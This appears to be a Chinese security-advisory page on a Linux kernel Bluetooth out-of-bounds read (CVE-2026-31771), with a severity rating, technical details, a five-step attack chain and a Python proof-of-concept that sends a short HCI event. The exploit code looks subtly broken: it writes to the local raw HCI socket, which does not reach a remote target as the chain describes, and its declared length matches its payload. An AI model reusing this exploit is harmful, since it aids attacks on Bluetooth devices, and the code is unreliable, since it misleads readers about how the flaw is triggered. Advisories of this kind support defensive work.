CVE-2026-31771 CVSS 8.1 高危

CVE-2026-31771 Linux内核蓝牙驱动越界读取漏洞

披露日期: 2026-05-01

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31771

漏洞类型

越界读取

CVSS评分

8.1 高危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核蓝牙驱动存在越界读取漏洞。由于`hci_store_wake_reason`在事件长度校验前调用，攻击者可利用特制的HCI短帧触发越界访问，导致信息泄露或内核崩溃。

技术细节

该漏洞位于Linux内核蓝牙子系统的核心事件处理逻辑中。具体而言，`hci_store_wake_reason()`在剥离HCI事件头后立即被调用，此时早于`hci_event_func()`执行的事件长度校验。攻击者可利用这一逻辑缺陷，发送特制的短HCI事件帧，使得`bacpy()`函数在未经过边界检查的情况下读取蓝牙地址。这种越界读取行为可能导致内存信息泄露，引发隐私风险，或在某些情况下导致内核崩溃。修复方案将唤醒原因的存储操作延迟到各个事件处理器内部，确保只有在通过长度验证后才执行地址拷贝，同时增加了锁断言以维护并发安全。

攻击链分析

STEP 1

步骤1

攻击者处于目标设备的蓝牙邻接网络范围内。

STEP 2

步骤2

构造一个恶意的HCI事件数据包，其声明长度足以触发解析，但实际有效载荷太短，无法包含完整的蓝牙地址。

STEP 3

步骤3

通过蓝牙将畸形的HCI事件帧发送给目标Linux设备。

STEP 4

步骤4

目标内核处理事件，在未校验长度前调用hci_store_wake_reason，导致bacpy()执行越界读取。

STEP 5

步骤5

触发信息泄露（读取内核内存）或系统崩溃（拒绝服务）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-31771
# Description: Trigger the out-of-bounds read by sending a malformed HCI Event.
# Note: This requires a Bluetooth adapter capable of raw HCI injection.

import socket
import struct

# Bluetooth HCI constants
BTPROTO_HCI = 1
HCI_EVENT_PKT = 0x04

def create_malformed_hci_event():
    """
    Constructs a short HCI event packet to trigger the vulnerability.
    The event is designed to be shorter than expected by the handler.
    """
    # Example: LE Meta Event or similar that expects a BD_ADDR
    event_code = 0x3E 
    plen = 0x01 # Claim payload length is 1, but handler expects >= 7 for bdaddr
    
    # Packet structure: Type, Event Code, Plen, Payload
    packet = struct.pack("<BBB", HCI_EVENT_PKT, event_code, plen)
    packet += b'\x00' # Insufficient payload
    
    return packet

def send_raw_hci(packet):
    sock = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_RAW, BTPROTO_HCI)
    sock.bind((0,))
    try:
        sock.send(packet)
        print("[+] Malformed HCI packet sent.")
    except Exception as e:
        print(f"[-] Error sending packet: {e}")
    finally:
        sock.close()

if __name__ == "__main__":
    print("Attempting to trigger CVE-2026-31771...")
    pkt = create_malformed_hci_event()
    send_raw_hci(pkt)

影响范围

Linux Kernel (修复提交之前的版本)

防御指南

临时缓解措施

如果无法立即升级，建议暂时关闭设备的蓝牙功能以规避攻击风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表